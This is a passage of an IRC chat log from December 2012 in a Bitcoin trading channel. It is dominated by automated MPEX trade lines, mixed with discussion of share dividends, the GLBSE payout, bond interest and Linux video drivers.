an artefact rather than a legitimate concern. how do we know yahoo mail isn't claiming them for themselves for that matter. Dec 01 00:58:37 [MPEX] [S.MPOE] 2345 @ 0.00052047 = 1.2205 BTC [-] Dec 01 00:58:39 [MPEX] [S.MPOE] 116 @ 0.00052043 = 0.0604 BTC [-] Dec 01 00:58:39 [MPEX] [S.MPOE] 23539 @ 0.00051926 = 12.2229 BTC [-] Dec 01 00:59:19 whoo hoo Dec 01 00:59:53 seems like I have 38.68 BTC in S.DICE shares, not bad Dec 01 01:00:02 what was the IPO value of them? Dec 01 01:00:12 I think 0.0032? Dec 01 01:00:45 ya Dec 01 01:00:53 ah, so pretty much the same Dec 01 01:01:30 if you have enough, it's not bad Dec 01 01:01:40 [MPEX] [S.MPOE] 2345 @ 0.00052925 = 1.2411 BTC [+] Dec 01 01:01:42 [MPEX] [S.MPOE] 26772 @ 0.00052937 = 14.1723 BTC [+] Dec 01 01:01:53 yea I don't think the dividends are paying out amazing amounts, I only have 1.13 btc balance xD Dec 01 01:01:58 and 11.5k shares Dec 01 01:02:09 I think once the ipo sells out they'll work their way up Dec 01 01:02:21 lol ipo still not sold after all this time Dec 01 01:02:35 no, I read they're in second tranche Dec 01 01:02:44 ah Dec 01 01:02:54 How can you claim such absurdities? The one holding the gigamining shares for you may very well have given his BTC address to GLBSE and then simply get an affidavit notified to that effect. If he doesn't consult a lawyer and just get it notified, it will only cost him a few dollars. Dec 01 01:02:57 [MPEX] [S.MPOE] 9460 @ 0.00052937 = 5.0078 BTC [+] Dec 01 01:02:58 [MPEX] [S.MPOE] 14934 @ 0.00053292 = 7.9586 BTC [+] Dec 01 01:03:06 the total shares in the IPO is only 10% of the company shares Dec 01 01:03:32 so the dividends get pretty dilluted before they get to you Dec 01 01:03:32 And for 1000 Gigamining shares, it's about 10 BTC or 120 USD per week that has been accumulated. Dec 01 01:04:09 That proxy could very well make a few easy BTC by claiming them. Dec 01 01:04:12 still, I think it'd be a good add for my bitcoin portoflio Dec 01 01:04:18 portfolio... Dec 01 01:04:44 [MPEX] [S.MPOE] 2345 @ 0.00052666 = 1.235 BTC [-] Dec 01 01:04:45 [MPEX] [S.MPOE] 10805 @ 0.00052648 = 5.6886 BTC [-] Dec 01 01:04:48 S.DICE pays about 1% per month. Dec 01 01:04:48 I can't wait for GLBSE to pay out, gonna be awesome :D Dec 01 01:05:03 I already got paid, fortunatly. Dec 01 01:05:11 yea, I'm waiting for SS Dec 01 01:05:12 I need the data now. Dec 01 01:05:18 yea, the data specifically Dec 01 01:05:22 It'll be nice to put it all behind us Dec 01 01:05:25 I got ~500btc in SS Dec 01 01:05:36 gonna get paid :D Dec 01 01:05:48 That's a hefty amount. Dec 01 01:06:02 indeed Dec 01 01:06:09 yeah, no wonder you're so excited. Dec 01 01:06:10 heh Dec 01 01:06:20 I would be too. :) Dec 01 01:06:48 I've been really worried about what to do with my bond holders for LTC-MINING. Dec 01 01:07:01 I hated having my ass hanging out waiting for Nef to get his act together. Dec 01 01:07:16 Azelphur: well, no list from nefario here :| Dec 01 01:07:17 yea Dec 01 01:07:22 smickles: :( Dec 01 01:07:30 and I only had a small fraction of the exposure giga does. :( Dec 01 01:07:53 I'm sure I'll be one of the last to get the list, I was a pretty small fish Dec 01 01:08:20 Well, I integrated my WHMCS cart with my template. How does it look? https://clients.namworld.net/clientarea.php Dec 01 01:08:30 nice Dec 01 01:08:42 Azelphur: ya know, i cant get the linux version of tf2 to work with my video driver, i tried to upgrade, but the newer drivers don't seem to work Dec 01 01:08:51 smickles: what card Dec 01 01:09:01 68XX iirc Dec 01 01:09:08 so ATI Dec 01 01:09:10 hmm Dec 01 01:09:14 ya Dec 01 01:09:20 are you using radeon or proprietary Dec 01 01:09:59 proprietary Dec 01 01:10:09 try using radeon, it actually worked on my laptop under radeon Dec 01 01:10:13 the one that shipped with 12.04 Dec 01 01:10:22 12.04 doesn't ship with proprietary Dec 01 01:10:46 [MPEX] [S.MPOE] 2345 @ 0.00053258 = 1.2489 BTC [+] Dec 01 01:10:47 [MPEX] [S.MPOE] 8555 @ 0.00053292 = 4.5591 BTC [+] Dec 01 01:10:53 that's the only option i have, maybe i did something weird Dec 01 01:11:59 go into the hardware drivers dialog and uninstall all ati things Dec 01 01:12:05 then try it Dec 01 01:13:10 i may as well give it a shot :) Dec 01 01:13:21 :) Dec 01 01:26:09 [MPEX] [S.MPOE] 15100 @ 0.00053292 = 8.0471 BTC [+] Dec 01 01:31:50 [MPEX] [S.MPOE] 2345 @ 0.00053073 = 1.2446 BTC [-] Dec 01 01:31:52 [MPEX] [S.MPOE] 4400 @ 0.00053065 = 2.3349 BTC [-] Dec 01 01:31:53 [MPEX] [S.MPOE] 17650 @ 0.00052761 = 9.3123 BTC [-] Dec 01 01:31:54 [MPEX] [S.MPOE] 1695 @ 0.00052648 = 0.8924 BTC [-] Dec 01 01:35:49 [MPEX] [S.MPOE] 20087 @ 0.00052627 = 10.5712 BTC [-] Dec 01 01:35:50 [MPEX] [S.MPOE] 4101 @ 0.00053292 = 2.1855 BTC [+] Dec 01 01:35:52 [MPEX] [S.MPOE] 13900 @ 0.00053401 = 7.4227 BTC [+] Dec 01 01:35:53 [MPEX] [S.MPOE] 612 @ 0.00053435 = 0.327 BTC [+] Dec 01 01:39:56 [MPEX] [S.MPOE] 2345 @ 0.00053405 = 1.2523 BTC [-] Dec 01 01:39:57 [MPEX] [S.MPOE] 27877 @ 0.00053435 = 14.8961 BTC [+] Dec 01 01:39:59 [MPEX] [S.MPOE] 12950 @ 0.00053455 = 6.9224 BTC [+] Dec 01 01:39:59 [MPEX] [S.MPOE] 4981 @ 0.00053495 = 2.6646 BTC [+] Dec 01 01:40:00 [MPEX] [S.MPOE] 15152 @ 0.00053498 = 8.106 BTC [+] Dec 01 01:43:49 [MPEX] [S.MPOE] 2345 @ 0.00052182 = 1.2237 BTC [-] Dec 01 01:43:51 [MPEX] [S.MPOE] 5705 @ 0.0005215 = 2.9752 BTC [-] Dec 01 01:52:08 [MPEX] [S.MPOE] 2345 @ 0.00052859 = 1.2395 BTC [+] Dec 01 01:52:10 [MPEX] [S.MPOE] 31105 @ 0.0005286 = 16.4421 BTC [+] Dec 01 01:54:26 kuzetsa: well, because my implementation uses gpg, the plugin's called gpg. :) Dec 01 01:55:08 kuzetsa: that said, you can use pgp whenever you need gpg, with gribble. i.e., pgp eauth works just as well as gpg eauth. :) Dec 01 01:58:19 ;;pgp info Dec 01 01:58:19 (gpg info [--key|--address] ) -- Returns the registration details of registered user . If '--key' option is given, interpret as a GPG key ID. Dec 01 01:58:26 :o Dec 01 01:58:45 [MPEX] [S.MPOE] 2345 @ 0.00052153 = 1.223 BTC [-] Dec 01 01:58:46 [MPEX] [S.MPOE] 3155 @ 0.0005215 = 1.6453 BTC [-] Dec 01 02:12:48 [MPEX] [S.MPOE] 2345 @ 0.00052838 = 1.2391 BTC [+] Dec 01 02:12:50 [MPEX] [S.MPOE] 21495 @ 0.0005286 = 11.3623 BTC [+] Dec 01 02:12:51 [MPEX] [S.MPOE] 22037 @ 0.0005291 = 11.6598 BTC [+] Dec 01 02:12:52 [MPEX] [S.MPOE] 8123 @ 0.00053498 = 4.3456 BTC [+] Dec 01 02:16:46 did anyone get any data in "exercises" part of mpex jsonstat reply? Dec 01 02:18:14 i had some options to autoexercise but they were worthless, so they just vanished without trace Dec 01 02:20:20 jurov i think month ends in ~40 minutes Dec 01 02:20:38 o nm it already went Dec 01 02:20:54 lol you live in CET nao Dec 01 02:21:03 a ok! lol. Dec 01 02:21:22 mircea_popescu: what was the final #? Dec 01 02:22:42 # ? Dec 01 02:22:53 i think he meant btcusd Dec 01 02:23:02 12.52 Dec 01 02:23:27 :) Dec 01 02:24:10 everyone please check out teh exercise. Dec 01 02:25:00 so it's supposed to send nothing if exercises result was 0? Dec 01 02:25:50 well yes. if option is worthless it just goes away Dec 01 02:25:59 [MPEX] [S.MPOE] 18397 @ 0.00052521 = 9.6623 BTC [-] Dec 01 02:26:01 [MPEX] [S.MPOE] 14103 @ 0.00053498 = 7.5448 BTC [+] Dec 01 02:26:07 you should charge for expiration Dec 01 02:26:20 me or mircea? Dec 01 02:26:34 most derivative exchanges charge a fee for exercise or non-exercise Dec 01 02:26:56 [MPEX] [S.DICE] 100 @ 0.00338428 = 0.3384 BTC [+] Dec 01 02:26:58 [MPEX] [S.DICE] 4300 @ 0.00338447 = 14.5532 BTC [+] Dec 01 02:27:37 i do charge 0.5% fee. mpex charges nothing iirc. Dec 01 02:27:39 i might eventually, but for now... let the people enjoy. Dec 01 02:28:18 [MPEX] [S.MPOE] 2345 @ 0.00052173 = 1.2235 BTC [-] Dec 01 02:28:20 [MPEX] [S.MPOE] 9050 @ 0.0005215 = 4.7196 BTC [-] Dec 01 02:33:20 [MPEX] [S.DICE] 1600 @ 0.00338405 = 5.4145 BTC [-] Dec 01 02:36:38 [MPEX] [S.DICE] 3200 @ 0.00336802 = 10.7777 BTC [-] Dec 01 02:38:08 [MPEX] [S.DICE] 2100 @ 0.00337956 = 7.0971 BTC [+] Dec 01 02:38:09 [MPEX] [S.DICE] 72 @ 0.00338447 = 0.2437 BTC [+] Dec 01 02:38:11 [MPEX] [S.DICE] 1126 @ 0.00339999 = 3.8284 BTC [+] Dec 01 02:39:46 [MPEX] [S.MPOE] 5500 @ 0.0005267 = 2.8969 BTC [+] Dec 01 02:39:47 [MPEX] [S.MPOE] 2345 @ 0.00052156 = 1.2231 BTC [-] Dec 01 02:39:48 [MPEX] [S.MPOE] 12590 @ 0.0005215 = 6.5657 BTC [-] Dec 01 02:44:04 [MPEX] [S.MPOE] 3142 @ 0.00051926 = 1.6315 BTC [-] Dec 01 02:44:04 [MPEX] [S.MPOE] 13100 @ 0.00051922 = 6.8018 BTC [-] Dec 01 02:44:05 [MPEX] [S.MPOE] 11568 @ 0.00051921 = 6.0062 BTC [-] Dec 01 02:45:53 [MPEX] [S.MPOE] 7259 @ 0.00051921 = 3.7689 BTC [-] Dec 01 02:45:54 [MPEX] [S.MPOE] 382 @ 0.00051903 = 0.1983 BTC [-] Dec 01 02:50:15 [MPEX] [S.MPOE] 14200 @ 0.00051903 = 7.3702 BTC [-] Dec 01 02:53:41 [MPEX] [S.MPOE] 1700 @ 0.00051903 = 0.8824 BTC [-] Dec 01 02:57:31 [MPEX] [S.MPOE] 6563 @ 0.00051903 = 3.4064 BTC [-] Dec 01 02:57:33 [MPEX] [S.MPOE] 26900 @ 0.00051899 = 13.9608 BTC [-] Dec 01 02:57:34 [MPEX] [S.MPOE] 3416 @ 0.00051888 = 1.7725 BTC [-] Dec 01 03:08:15 http://trilema.com/2012/mpoe-november-2012-statement/ Dec 01 03:08:20 mpoe/mpex results are out. Dec 01 03:08:50 [MPEX] [S.MPOE] 12834 @ 0.00051888 = 6.6593 BTC [-] Dec 01 03:08:51 [MPEX] [S.MPOE] 9066 @ 0.00051884 = 4.7038 BTC [-] Dec 01 03:11:12 [MPEX] [S.MPOE] 2345 @ 0.0005206 = 1.2208 BTC [+] Dec 01 03:11:14 [MPEX] [S.MPOE] 7655 @ 0.00052078 = 3.9866 BTC [+] Dec 01 03:20:45 [MPEX] [S.MPOE] 2345 @ 0.00052058 = 1.2208 BTC [-] Dec 01 03:20:47 [MPEX] [S.MPOE] 12005 @ 0.00052078 = 6.252 BTC [+] Dec 01 03:22:19 i was thinking the dividend will be bigger, forgot that you have to pay interest on the bonds Dec 01 03:22:50 ya, was a huge outlay this month Dec 01 03:23:05 well, in comparative terms at least. Dec 01 03:27:29 haha actually my experiment to issue options funded by loan ended up similarly Dec 01 03:29:14 [MPEX] [S.MPOE] [PAID] 1000000000 @ 0.00000043 = 433.9709646 BTC Dec 01 03:30:44 how's that ? Dec 01 03:31:09 [MPEX] [S.MPOE] 2345 @ 0.00051887 = 1.2168 BTC [-] Dec 01 03:31:10 [MPEX] [S.MPOE] 2134 @ 0.00051884 = 1.1072 BTC [-] Dec 01 03:31:12 [MPEX] [S.MPOE] 4300 @ 0.00051881 = 2.2309 BTC [-] Dec 01 03:31:13 [MPEX] [S.MPOE] 13350 @ 0.0005188 = 6.926 BTC [-] Dec 01 03:31:14 [MPEX] [S.MPOE] 13100 @ 0.0005186 = 6.7937 BTC [-] Dec 01 03:31:15 [MPEX] [S.MPOE] 15250 @ 0.00051829 = 7.9039 BTC [-] Dec 01 03:31:16 [MPEX] [S.MPOE] 6900 @ 0.00051782 = 3.573 BTC [-] Dec 01 03:31:17 [MPEX] [S.MPOE] 1800 @ 0.00051755 = 0.9316 BTC [-] Dec 01 03:31:19 [MPEX] [S.MPOE] 34000 @ 0.00051753 = 17.596 BTC [-] Dec 01 03:31:19 [MPEX] [S.MPOE] 38400 @ 0.00051734 = 19.8659 BTC [-] Dec 01 03:31:20 [MPEX] [S.MPOE] 3499 @ 0.00051699 = 1.8089 BTC [-] Dec 01 03:31:21 [MPEX] [S.MPOE] 27826 @ 0.00051652 = 14.3727 BTC [-] Dec 01 03:31:22 [MPEX] [S.MPOE] 15500 @ 0.0005164 = 8.0042 BTC [-] Dec 01 03:31:23 [MPEX] [S.MPOE] 23150 @ 0.00051626 = 11.9514 BTC [-] Dec 01 03:31:24 [MPEX] [S.MPOE] 10900 @ 0.00051624 = 5.627 BTC [-] Dec 01 03:31:25 [MPEX] [S.MPOE] 10650 @ 0.00051594 = 5.4948 BTC [-] Dec 01 03:31:26 [MPEX] [S.MPOE] 45912 @ 0.00051567 = 23.6754 BTC [-] Dec 01 03:31:27 [MPEX] [S.MPOE] 13938 @ 0.00051553 = 7.1855 BTC [-] Dec 01 03:31:28 [MPEX] [S.MPOE] 25215 @ 0.00051553 = 12.9991 BTC [-] Dec 01 03:31:28 [MPEX] [S.MPOE] 31700 @ 0.00051552 = 16.342 BTC [-] Dec 01 03:31:29 [MPEX] [S.MPOE] 13950 @ 0.00051546 = 7.1907 BTC [-] Dec 01 03:31:31 [MPEX] [S.MPOE] 2200 @ 0.00051543 = 1.1339 BTC [-] Dec 01 03:31:32 [MPEX] [S.MPOE] 19300 @ 0.00051542 = 9.9476 BTC [-] Dec 01 03:31:33 [MPEX] [S.MPOE] 12042 @ 0.0005153 = 6.2052 BTC [-] Dec 01 03:31:34 [MPEX] [S.MPOE] 16550 @ 0.00051528 = 8.5279 BTC [-] Dec 01 03:31:35 [MPEX] [S.MPOE] 6750 @ 0.00051527 = 3.4781 BTC [-] Dec 01 03:31:36 [MPEX] [S.MPOE] 10800 @ 0.00051509 = 5.563 BTC [-] Dec 01 03:31:37 [MPEX] [S.MPOE] 27720 @ 0.00051486 = 14.2719 BTC [-] Dec 01 03:31:38 [MPEX] [S.MPOE] 14100 @ 0.00051448 = 7.2542 BTC [-] Dec 01 03:31:38 [MPEX] [S.MPOE] 19650 @ 0.00051427 = 10.1054 BTC [-] Dec 01 03:31:39 [MPEX] [S.MPOE] 28400 @ 0.00051425 = 14.6047 BTC [-] Dec 01 03:31:40 [MPEX] [S.MPOE] 30400 @ 0.00051416 = 15.6305 BTC [-] Dec 01 03:31:41 [MPEX] [S.MPOE] 7000 @ 0.00051408 = 3.5986 BTC [-] Dec 01 03:31:42 [MPEX] [S.MPOE] 19400 @ 0.00051401 = 9.9718 BTC [-] Dec 01 03:31:43 [MPEX] [S.MPOE] 23200 @ 0.00051401 = 11.925 BTC [-] Dec 01 03:31:44 [MPEX] [S.MPOE] 10200 @ 0.00051399 = 5.2427 BTC [-] Dec 01 03:31:45 [MPEX] [S.MPOE] 19800 @ 0.00051389 = 10.175 BTC [-] Dec 01 03:31:46 [MPEX] [S.MPOE] 7500 @ 0.00051369 = 3.8527 BTC [-] Dec 01 03:31:47 [MPEX] [S.MPOE] 15789 @ 0.00051365 = 8.11 BTC [-] Dec 01 03:31:48 [MPEX] [S.MPOE] 10995 @ 0.00051351 = 5.646 BTC [-] Dec 01 03:31:49 [MPEX] [S.MPOE] 26700 @ 0.00051349 = 13.7102 BTC [-] Dec 01 03:31:50 [MPEX] [S.MPOE] 22600 @ 0.00051333 = 11.6013 BTC [-] Dec 01 03:31:51 [MPEX] [S.MPOE] 27200 @ 0.00051317 = 13.9582 BTC [-] Dec 01 03:31:52 [MPEX] [S.MPOE] 7085 @ 0.00051307 = 3.6351 BTC [-] Dec 01 03:31:53 [MPEX] [S.MPOE] 12332 @ 0.00051297 = 6.3259 BTC [-] Dec 01 03:31:54 [MPEX] [S.MPOE] 26700 @ 0.00051294 = 13.6955 BTC [-] Dec 01 03:31:55 eee Dec 01 03:31:55 [MPEX] [S.MPOE] 19150 @ 0.00051288 = 9.8217 BTC [-] Dec 01 03:31:56 [MPEX] [S.MPOE] 2618 @ 0.00051287 = 1.3427 BTC [-] Dec 01 03:31:57 [MPEX] [S.MPOE] 15932 @ 0.00051287 = 8.171 BTC [-] Dec 01 03:31:58 [MPEX] [S.MPOE] 8700 @ 0.00051267 = 4.4602 BTC [-] Dec 01 03:31:59 [MPEX] [S.MPOE] 12163 @ 0.00051259 = 6.2346 BTC [-] Dec 01 03:37:41 [MPEX] [S.MPOE] 2345 @ 0.00052077 = 1.2212 BTC [+] Dec 01 03:37:42 [MPEX] [S.MPOE] 9605 @ 0.00052078 = 5.0021 BTC [+] Dec 01 03:38:13 so mircea_popescu, the mpoe bot would've made about 2kbtc if not for the cost of borrowing btc? Dec 01 03:39:20 funny, it feels like the mpbor holders lost btc, somehow, b/c the charged too high of interest Dec 01 03:41:40 but they only lost some principal, and received a 9.9% interest payment, right? Dec 01 03:42:27 or do i need to reread the terms Dec 01 03:43:32 [MPEX] [S.MPOE] 2345 @ 0.00051261 = 1.2021 BTC [-] Dec 01 03:43:41 [MPEX] [S.MPOE] 7937 @ 0.00051259 = 4.0684 BTC [-] Dec 01 03:43:41 [MPEX] [S.MPOE] 3173 @ 0.00051247 = 1.6261 BTC [-] Dec 01 03:44:40 they lost ~4.x% on principal and made 9.9% cash upfront Dec 01 03:44:57 it worked sort of like a miner bond, this month, except they didn't lose 10% on capital and made 3% in dividends Dec 01 03:45:00 but the other way around Dec 01 03:46:22 of course not that many miner bonds that pay 2k btc a month either, so... yeah. Dec 01 03:51:15 heh, so they are eating into their own principal a bit. that's a little humorous Dec 01 03:56:06 i think it's actually quite a good safeguard Dec 01 03:56:44 you can deposit a bond and go climb the hymalaya, knowing that if mpoe starts to underperform you get your bond sent back little by little. Dec 01 03:56:44 [MPEX] [S.MPOE] 2345 @ 0.00051956 = 1.2184 BTC [+] Dec 01 03:56:45 [MPEX] [S.MPOE] 9581 @ 0.00051987 = 4.9809 BTC [+] Dec 01 04:05:28 [MPEX] [S.MPOE] 719 @ 0.00051987 = 0.3738 BTC [+] Dec 01 04:05:29 [MPEX] [S.MPOE] 10381 @ 0.00052 = 5.3981 BTC [+] Dec 01 04:13:52 [MPEX] [S.MPOE] 2345 @ 0.00051399 = 1.2053 BTC [-] Dec 01 04:13:52 [MPEX] [S.MPOE] 26977 @ 0.00051399 = 13.8659 BTC [-] Dec 01 04:13:53 [MPEX] [S.MPOE] 9284 @ 0.00051385 = 4.7706 BTC [-] Dec 01 04:22:36 [MPEX] [S.MPOE] 8500 @ 0.00051797 = 4.4027 BTC [+] Dec 01 04:22:37 [MPEX] [S.MPOE] 2345 @ 0.00051418 = 1.2058 BTC [-] Dec 01 04:22:39 [MPEX] [S.MPOE] 6010 @ 0.00051385 = 3.0882 BTC [-] Dec 01 04:25:45 [MPEX] [S.MPOE] 3106 @ 0.00051385 = 1.596 BTC [-] Dec 01 04:25:47 [MPEX] [S.MPOE] 14450 @ 0.00051247 = 7.4052 BTC [-] Dec 01 04:25:48 [MPEX] [S.MPOE] 19972 @ 0.00051247 = 10.2351 BTC [-] Dec 01 04:27:52 [MPEX] [S.MPOE] 2139 @ 0.00051248 = 1.0962 BTC [+] Dec 01 04:30:59 [MPEX] [S.MPOE] 7861 @ 0.00051248 = 4.0286 BTC [+] Dec 01 04:31:00 [MPEX] [S.MPOE] 6605 @ 0.00051247 = 3.3849 BTC [-] Dec 01 04:31:02 [MPEX] [S.MPOE] 6209 @ 0.00051228 = 3.1807 BTC [-] Dec 01 04:31:03 [MPEX] [S.MPOE] 3575 @ 0.00051221 = 1.8312 BTC [-] Dec 01 04:35:27 [MPEX] [S.MPOE] 3300 @ 0.00051222 = 1.6903 BTC [+] Dec 01 04:35:27 dammit mircea_popescu you know what this means? Dec 01 04:35:45 ? Dec 01 04:36:08 remember when I said that I ought to put some btc towards the mpbor @ 25%? Dec 01 04:36:21 I would've gotten it this month, no? Dec 01 04:36:48 yup Dec 01 04:36:57 pushed it to 25% lmao Dec 01 04:36:57 :| Dec 01 04:37:44 [MPEX] [S.MPOE] 2345 @ 0.00051967 = 1.2186 BTC [+] Dec 01 04:37:45 [MPEX] [S.MPOE] 8778 @ 0.00052 = 4.5646 BTC [+] Dec 01 04:37:46 [MPEX] [S.MPOE] 31739 @ 0.00052078 = 16.529 BTC [+] Dec 01 04:39:33 mircea_popescu: ok, so for next time: I need to remember to put in a bid and lay down the btc before the end of month turnover Dec 01 04:39:48 they only count for full months. Dec 01 04:39:56 you have 48 hours to get in the current one. Dec 01 04:40:04 hmm Dec 01 04:40:19 i had forgotten about the grace period Dec 01 04:43:19 [MPEX] [S.MPOE] 2345 @ 0.00051226 = 1.2012 BTC [-] Dec 01 04:43:19 [MPEX] [S.MPOE] 6700 @ 0.00051222 = 3.4319 BTC [-] Dec 01 04:43:21 [MPEX] [S.MPOE] 6005 @ 0.00051221 = 3.0758 BTC [-] Dec 01 04:45:34 [MPEX] [S.MPOE] 2345 @ 0.00052076 = 1.2212 BTC [+] Dec 01 04:45:36 [MPEX] [S.MPOE] 9654 @ 0.00052078 = 5.0276 BTC [+] Dec 01 04:45:37 [MPEX] [S.MPOE] 9251 @ 0.00052282 = 4.8366 BTC [+] Dec 01 04:59:42 [MPEX] [S.MPOE] 2345 @ 0.00052265 = 1.2256 BTC [-] Dec 01 04:59:44 [MPEX] [S.MPOE] 3264 @ 0.00052282 = 1.7065 BTC [+] Dec 01 05:09:55 [MPEX] [S.MPOE] 2345 @ 0.00052393 = 1.2286 BTC [+] Dec 01 05:09:57 [MPEX] [S.MPOE] 10785 @ 0.0005236 = 5.647 BTC [-] Dec 01 05:09:58 [MPEX] [S.MPOE] 8070 @ 0.00052169 = 4.21 BTC [-] Dec 01 05:21:09 [MPEX] [S.DICE] 5882 @ 0.00339999 = 19.9987 BTC [+] Dec 01 05:26:39 finally homer Dec 01 05:27:29 [MPEX] [S.MPOE] 2345 @ 0.00052605 = 1.2336 BTC [+] Dec 01 05:27:31 [MPEX] [S.MPOE] 12234 @ 0.00052615 = 6.4369 BTC [+] Dec 01 05:27:32 [MPEX] [S.MPOE] 8500 @ 0.00052879 = 4.4947 BTC [+] Dec 01 05:27:33 [MPEX] [S.MPOE] 4521 @ 0.00052908 = 2.392 BTC [+] Dec 01 05:28:52 homer? Dec 01 05:30:06 took the eldest out to his fridya night thing Dec 01 05:31:21 [MPEX] [S.MPOE] 2345 @ 0.00052176 = 1.2235 BTC [-] Dec 01 05:31:22 [MPEX] [S.MPOE] 12279 @ 0.00052169 = 6.4058 BTC [-] Dec 01 05:31:23 [MPEX] [S.MPOE] 4600 @ 0.0005159 = 2.3731 BTC [-] Dec 01 05:31:25 [MPEX] [S.MPOE] 16476 @ 0.00051548 = 8.493 BTC [-] Dec 01 05:44:04 [MPEX] [S.MPOE] 2345 @ 0.00051555 = 1.209 BTC [+] Dec 01 05:44:05 [MPEX] [S.MPOE] 6855 @ 0.00051548 = 3.5336 BTC [-] Dec 01 05:48:40 [MPEX] [S.MPOE] 2345 @ 0.00052795 = 1.238 BTC [+] Dec 01 05:48:41 [MPEX] [S.MPOE] 9700 @ 0.00052824 = 5.1239 BTC [+] Dec 01 05:48:42 [MPEX] [S.MPOE] 3855 @ 0.00052908 = 2.0396 BTC [+] Dec 01 06:01:07 [MPEX] [S.MPOE] 2345 @ 0.00051549 = 1.2088 BTC [-] Dec 01 06:01:08 [MPEX] [S.MPOE] 7819 @ 0.00051548 = 4.0305 BTC [-] Dec 01 06:01:10 [MPEX] [S.MPOE] 4000 @ 0.00051545 = 2.0618 BTC [-] Dec 01 06:01:11 [MPEX] [S.MPOE] 17436 @ 0.0005149 = 8.9778 BTC [-] Dec 01 06:13:55 [MPEX] [S.DICE] 1500 @ 0.00336802 = 5.052 BTC [-] Dec 01 06:13:57 [MPEX] [S.DICE] 2600 @ 0.00333051 = 8.6593 BTC [-] Dec 01 06:21:08 [MPEX] [S.MPOE] 4600 @ 0.00052822 = 2.4298 BTC [+] Dec 01 06:21:10 [MPEX] [S.MPOE] 2022 @ 0.00052767 = 1.0669 BTC [-] Dec 01 06:22:47 [MPEX] [S.MPOE] 2345 @ 0.00052884 = 1.2401 BTC [+] Dec 01 06:22:49 [MPEX] [S.MPOE] 28074 @ 0.00052908 = 14.8534 BTC [+] Dec 01 06:22:50 [MPEX] [S.MPOE] 26100 @ 0.00052929 = 13.8145 BTC [+] Dec 01 06:22:51 [MPEX] [S.MPOE] 1093 @ 0.00052949 = 0.5787 BTC [+] Dec 01 06:24:57 [MPEX] [S.MPOE] 2345 @ 0.0005279 = 1.2379 BTC [-] Dec 01 06:24:58 [MPEX] [S.MPOE] 5305 @ 0.00052767 = 2.7993 BTC [-] Dec 01 06:48:07 [MPEX] [S.MPOE] 6850 @ 0.00052873 = 3.6218 BTC [+] Dec 01 06:48:08 [MPEX] [S.MPOE] 3100 @ 0.0005289 = 1.6396 BTC [+] Dec 01 06:50:32 [MPEX] [S.MPOE] 13800 @ 0.00052859 = 7.2945 BTC [-] Dec 01 06:56:26 [MPEX] [S.MPOE] 18800 @ 0.00052859 = 9.9375 BTC [-] Dec 01 06:56:28 [MPEX] [S.MPOE] 5273 @ 0.00052767 = 2.7824 BTC [-] Dec 01 06:56:29 [MPEX] [S.MPOE] 5327 @ 0.00052317 = 2.7869 BTC [-] Dec 01 07:07:29 [MPEX] [S.MPOE] 2345 @ 0.00052859 = 1.2395 BTC [+] Dec 01 07:07:31 [MPEX] [S.MPOE] 15429 @ 0.00052867 = 8.1568 BTC [+] Dec 01 07:07:32 [MPEX] [S.MPOE] 2226 @ 0.0005289 = 1.1773 BTC [+] Dec 01 07:10:59 [MPEX] [S.MPOE] 2345 @ 0.00052321 = 1.2269 BTC [-] Dec 01 07:11:01 [MPEX] [S.MPOE] 18155 @ 0.00052317 = 9.4982 BTC [-] Dec 01 07:11:59 [MPEX] [S.MPOE] 2345 @ 0.00052879 = 1.24 BTC [+] Dec 01 07:12:00 [MPEX] [S.MPOE] 13074 @ 0.0005289 = 6.9148 BTC [+] Dec 01 07:12:02 [MPEX] [S.MPOE] 281 @ 0.00052949 = 0.1488 BTC [+] Dec 01 07:27:36 [MPEX] [S.MPOE] 2345 @ 0.00052342 = 1.2274 BTC [-] Dec 01 07:27:37 [MPEX] [S.MPOE] 7918 @ 0.00052317 = 4.1425 BTC [-] Dec 01 07:39:54 [MPEX] [S.MPOE] 16900 @ 0.00052141 = 8.8118 BTC [-] Dec 01 07:42:54 [MPEX] [S.MPOE] 5000 @ 0.00051641 = 2.5821 BTC [-] Dec 01 07:55:23 [MPEX] [S.MPOE] 15750 @ 0.00051641 = 8.1335 BTC [-] Dec 01 07:57:19 [MPEX] [S.MPOE] 16185 @ 0.00051751 = 8.3759 BTC [+] Dec 01 08:06:00 [MPEX] [S.MPOE] 2345 @ 0.00052291 = 1.2262 BTC [+] Dec 01 08:06:01 [MPEX] [S.MPOE] 2857 @ 0.00052308 = 1.4944 BTC [+] Dec 01 08:06:02 [MPEX] [S.MPOE] 12198 @ 0.00052928 = 6.4562 BTC [+] Dec 01 08:11:44 [MPEX] [S.MPOE] 2345 @ 0.00052188 = 1.2238 BTC [-] Dec 01 08:11:46 [MPEX] [S.MPOE] 1855 @ 0.00052153 = 0.9674 BTC [-] Dec 01 08:13:01 [MPEX] [S.MPOE] 2272 @ 0.00052153 = 1.1849 BTC [-] Dec 01 08:13:03 [MPEX] [S.MPOE] 5778 @ 0.00052035 = 3.0066 BTC [-] **** BEGIN LOGGING AT Sat Dec 1 18:54:43 2012 Dec 01 19:01:25 [MPEX] [S.MPOE] 2345 @ 0.00052258 = 1.2255 BTC [-] Dec 01 19:01:26 [MPEX] [S.MPOE] 20673 @ 0.00052272 = 10.8062 BTC [+] Dec 01 19:01:28 [MPEX] [S.MPOE] 18050 @ 0.00052348 = 9.4488 BTC [+] Dec 01 19:01:29 [MPEX] [S.MPOE] 5382 @ 0.00052419 = 2.8212 BTC [+] Dec 01 19:09:05 [MPEX] [S.MPOE] 21772 @ 0.00052419 = 11.4127 BTC [+] Dec 01 19:12:17 [MPEX] [S.MPOE] 1346 @ 0.00052419 = 0.7056 BTC [+] Dec 01 19:12:21 [MPEX] [S.MPOE] 4950 @ 0.00052422 = 2.5949 BTC [+] Dec 01 19:12:21 [MPEX] [S.MPOE] 654 @ 0.00052509 = 0.3434 BTC [+] Dec 01 19:13:22 ;;ticker Dec 01 19:13:23 BTCUSD ticker | Best bid: 12.48002, Best ask: 12.48003, Bid-ask spread: 0.00001, Last trade: 12.48002, 24 hour volume: 16081.47869182, 24 hour low: 12.46000, 24 hour high: 12.68778, 24 hour vwap: 12.57870 Dec 01 19:18:12 [MPEX] [S.MPOE] 2345 @ 0.00051986 = 1.2191 BTC [-] Dec 01 19:18:13 [MPEX] [S.MPOE] 1075 @ 0.00051962 = 0.5586 BTC [-] Dec 01 19:18:15 [MPEX] [S.MPOE] 8080 @ 0.00051406 = 4.1536 BTC [-] Dec 01 19:30:46 [MPEX] [S.MPOE] 9379 @ 0.00051492 = 4.8294 BTC [+] Dec 01 19:30:48 [MPEX] [S.MPOE] 10350 @ 